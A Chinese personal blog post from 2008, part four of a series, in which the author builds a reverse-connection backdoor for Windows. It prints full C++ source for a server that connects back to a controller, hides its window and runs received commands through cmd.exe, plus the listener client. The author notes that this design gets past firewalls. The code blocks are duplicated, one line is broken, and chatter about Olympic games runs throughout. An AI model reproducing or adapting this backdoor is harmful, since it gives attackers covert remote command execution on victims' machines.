循环渐进NsDoor(四)
今天还算顺利,写反弹木马(姑且叫木马,其实才是个后门)的时候客户端和服务端都没有出现太大的问题,可是ReadFile函数还是会读不出数据,而且会程序死在那里…我可不敢怀疑是MS的问题,正在努力寻找答案中…
调试的时候出了个很大的意外,在单步跟的时候,突然程序卡住了,VS08一直显示正在运行,不正在调试了,当时正好执行在Sleep(300)那句后面的跳转上,我当时还以为是在执行Sleep(300)那系统真的睡着了呢….就在我惊诧间,之见VS给了我个MESSAGE,上面显示:程序有可能出现死锁(大意如此)….
女单决赛之张宁拿到冠军我很开心….
今天还算顺利,写反弹木马(姑且叫木马,其实才是个后门)的时候客户端和服务端都没有出现太大的问题,可是ReadFile函数还是会读不出数据,而且会程序死在那里…我可不敢怀疑是MS的问题,正在努力寻找答案中…
调试的时候出了个很大的意外,在单步跟的时候,突然程序卡住了,VS08一直显示正在运行,不正在调试了,当时正好执行在Sleep(300)那句后面的跳转上,我当时还以为是在执行Sleep(300)那系统真的睡着了呢….就在我惊诧间,之见VS给了我个MESSAGE,上面显示:程序有可能出现死锁(大意如此)….
后来发现是ReadFile()出现的死锁…
然后我关闭后再调试一次,我靠,更大的意外,系统蓝屏了!!!!
这是我在VISTA下第一次遇到的蓝屏,雷死我了…
顿时想到:奥运会那张图片,蓝屏的投影显示在了那个东东上,够雷人…
不过我不惧艰险,继续调试…
终于,没在出现蓝屏和死锁……………………
今天准备给反弹木马加上密码验证的,但是想到别人又可能截包得到密码,必须是在客户端验证了的说。。。,但是还不安全…
想到MD5加密,后来想这么多函数,怎么shellcode嘛..
给服务端加了不是CMD命令的执行功能(一个例子而已,证明可以,并且方便以后扩展,就是一个退出的ns exit命令.而且有点逻辑错误,懒得改了,跳的位置不对而已)…
先给服务端:
Reverse.cpp
#include<iostream>
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
#define PORT 1517
#define IP "127.0.0.1"
int main()
{
WSADATA ws;
SOCKET sockfd;
int ret = 0;
unsigned long lBytesRead = 0;
WSAStartup(MAKEWORD(2,2),&ws);
sockfd = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr.S_un.S_addr = inet_addr(IP);
while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);//我喜欢这样写,呵呵
SECURITY_ATTRIBUTES pipeattr;
HANDLE hReadPipe,hWritePipe;
pipeattr.nLength = 12;
pipeattr.bInheritHandle = true;
pipeattr.lpSecurityDescriptor = 0;
CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);
STARTUPINFOA si;
ZeroMemory(&si,sizeof si);
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdOutput = si.hStdError = hWritePipe;//木输入管道
PROCESS_INFORMATION ProcessInformation;
char Command[200] = {0};
char Buf[1024] = {0};
char RecvBuf[200] = {0};
while(true)
{
recv(sockfd,RecvBuf,200,0);
if(RecvBuf[0]=='n' && RecvBuf[1]=='s')
{
/*
可扩展部分,用它来实现零管道搞不定的东西,目前先不实现
DEMO: 1.exit
*/
if(strcmp(RecvBuf,"ns exit") == 0)
{
CloseHandle(hReadPipe);
CloseHandle(hWritePipe);
closesocket(sockfd);
break;
}
}
else
{
strcat_s(Command,200,"cmd.exe /c");
strcat_s(Command,200,RecvBuf);
while(CreateProcessA(NULL,Command,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);
Sleep(1000);
//CloseHandle(hWritePipe);
ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);
send(sockfd,Buf,1024,0);
memset(Buf,0,1024);
Sleep(100);
}
/*while(true)
{
if(ReadFile(hReadPipe,Buf,1024,&lBytesRead,NULL) == 0)//日,又出现死锁,我在这竟然蓝屏了一次..狂汗
{
break;
}
cout<<Buf<<endl;
send(sockfd,Buf,1024,0);
memset(Buf,0,1024);
Sleep(100);
}*/
memset(Command,0,200);
memset(RecvBuf,0,200);
}
return 0;
}
#include<iostream>
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
#define PORT 1517
#define IP "127.0.0.1"
int main()
{
WSADATA ws;
SOCKET sockfd;
int ret = 0;
unsigned long lBytesRead = 0;
WSAStartup(MAKEWORD(2,2),&ws);
sockfd = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr.S_un.S_addr = inet_addr(IP);
while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);//我喜欢这样写,呵呵
SECURITY_ATTRIBUTES pipeattr;
HANDLE hReadPipe,hWritePipe;
pipeattr.nLength = 12;
pipeattr.bInheritHandle = true;
pipeattr.lpSecurityDescriptor = 0;
CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);
STARTUPINFOA si;
ZeroMemory(&si,sizeof si);
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdOutput = si.hStdError = hWritePipe;//木输入管道
PROCESS_INFORMATION ProcessInformation;
char Command[200] = {0};
char Buf[1024] = {0};
char RecvBuf[200] = {0};
while(true)
{
recv(sockfd,RecvBuf,200,0);
if(RecvBuf[0]=='n' && RecvBuf[1]=='s')
{
/*
可扩展部分,用它来实现零管道搞不定的东西,目前先不实现
DEMO: 1.exit
*/
if(strcmp(RecvBuf,"ns exit") == 0)
{
CloseHandle(hReadPipe);
CloseHandle(hWritePipe);
closesocket(sockfd);
break;
}
}
else
{
strcat_s(Command,200,"cmd.exe /c");
strcat_s(Command,200,RecvBuf);
while(CreateProcessA(NULL,Command,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);
Sleep(1000);
//CloseHandle(hWritePipe);
ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);
send(sockfd,Buf,1024,0);
memset(Buf,0,1024);
Sleep(100);
}
/*while(true)
{
if(ReadFile(hReadPipe,Buf,1024,&lBytesRead,NULL) == 0)//日,又出现死锁,我在这竟然蓝屏了一次..狂汗
{
break;
}
cout<<Buf<<endl;
send(sockfd,Buf,1024,0);
memset(Buf,0,1024);
Sleep(100);
}*/
memset(Command,0,200);
memset(RecvBuf,0,200);
}
return 0;
}
再给客户端:
NsClient.cpp
#include<iostream>
#include<winsock2.h>
#include<string.h>
using namespace std;
#pragma comment(lib,"Ws2_32")
int main()
{
const int PORT = 1517;
const int BACKLOG = 2;//端口为常量问题在生成器部分应该可以解决
int sockfd,new_fd;
int sin_size;
int ret;
char Buf[1024];
struct sockaddr_in server_addr;
WSADATA ws;
WSAStartup(MAKEWORD(2,2),&ws);
sockfd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);//IPPROTO_TCP
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr.s_addr = ADDR_ANY;
ret = bind(sockfd,(struct sockaddr*)&server_addr,sizeof server_addr);
ret = listen(sockfd,BACKLOG);
sin_size = sizeof server_addr;
new_fd = accept(sockfd,(struct sockaddr*)&server_addr,&sin_size);
char Command[200] = {0};
cout<<" -------------------------*******************-------------------------"<<endl;
cout<<" - -"<<endl;
cout<<" - Welcome to a magic world,NewSketcher~ -"<<endl;
cout<<" - -"<<endl;
cout<<" - QQ:381002948 E-mail:ns517@126.com -"<<endl;
cout<<" - -"<<endl;
cout<<" -------------------------*******************-------------------------"<<endl;
cout<<endl;
cout<<"Connection OK!"<<endl<<"You can input the CmdLine OR."<<endl<<endl;//还有功能未实现呵呵
while(true)
{
cout<<"CmdLine:"">";
cin.getline(Command,200);
send(new_fd,Command,200,0);
recv(new_fd,Buf,1024,0);
cout<<Buf<<endl;
memset(Command,0,200);
memset(Buf,0,1024);
}
}
#include<iostream>
#include<winsock2.h>
#include<string.h>
using namespace std;
#pragma comment(lib,"Ws2_32")
int main()
{
const int PORT = 1517;
const int BACKLOG = 2;//端口为常量问题在生成器部分应该可以解决
int sockfd,new_fd;
int sin_size;
int ret;
char Buf[1024];
struct sockaddr_in server_addr;
WSADATA ws;
WSAStartup(MAKEWORD(2,2),&ws);
sockfd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);//IPPROTO_TCP
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr.s_addr = ADDR_ANY;
ret = bind(sockfd,(struct sockaddr*)&server_addr,sizeof server_addr);
ret = listen(sockfd,BACKLOG);
sin_size = sizeof server_addr;
new_fd = accept(sockfd,(struct sockaddr*)&server_addr,&sin_size);
char Command[200] = {0};
cout<<" -------------------------*******************-------------------------"<<endl;
cout<<" - -"<<endl;
cout<<" - Welcome to a magic world,NewSketcher~ -"<<endl;
cout<<" - -"<<endl;
cout<<" - QQ:381002948 E-mail:ns517@126.com -"<<endl;
cout<<" - -"<<endl;
cout<<" -------------------------*******************-------------------------"<<endl;
cout<<endl;
cout<<"Connection OK!"<<endl<<"You can input the CmdLine OR
."<<endl<<endl;//还有功能未实现呵呵 while(true)
{
cout<<"CmdLine:"">";
cin.getline(Command,200);
send(new_fd,Command,200,0);
recv(new_fd,Buf,1024,0);
cout<<Buf<<endl;
memset(Command,0,200);
memset(Buf,0,1024);
}
}
仔细看后,你会发现,原来发弹的原理就是把客户端当服务端,把服务端当客户端,汗…
while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);//我喜欢这样写,呵呵
服务端的这句话,看明白没。。。其实就是等着我们来连接他…
反弹的好处就是.现在的服务端不会被防火墙拦截了,客户端反而被拦截,不过没关系,客户端在攻击机上,我们直接放行就OK了,啊哈哈
惯例,测试报告,还是在本机用127.0.0.1 1517测试,一般网上的反弹后门都是用telnet和NC做客户端,但是我为了扩展性,还是自己写了客户端…
编译后:
上图里的EXE为客户端和服务端
运行服务端(服务端没加那句隐藏代码,想加的自己加上就行了):
为了程序大小和性能,我吝啬的把输入输出都舍了,汗…
客户端:
是不是和以前的正向连接差不多,呵呵
我就是直接抄的前面的代码…
还有,顺便说下,客户端和服务端谁先运行都没得关系的..
执行命令看下:
Dir的结果
Net user的结果
Net time&net share的结果..(&的作用)
我怎么开了这么多共享…..
Ping的结果,因为有时间问题,所以所有消息没有完全返回,怎么办?
看见没,什么命令都不输入,它会把没显示玩的信息再显示出来,跟下程序就明白原因了,其实算是个小bug吧…
再看不是CMD的命令..
我的想法是所有特殊命令前面都加上标识ns
执行ns exit
貌似没什么特别,但是服务端此时已经关闭了,其实这也算是个小BUG,怎么让它不是退出,而是重新初始化,等待下次连接,其实很简单的,改个跳转就行了,我就不改了…
啊啊啊啊啊啊啊!中国男篮又出现了,我是边看电视边写的!!!!
孙悦很好很强大,我喜欢
易建联又来关键球,刘伟最后抢断诺维斯基!!!
大家都是好样的~~~
----------------------------by NewSketcher
Time: 080816 21:47
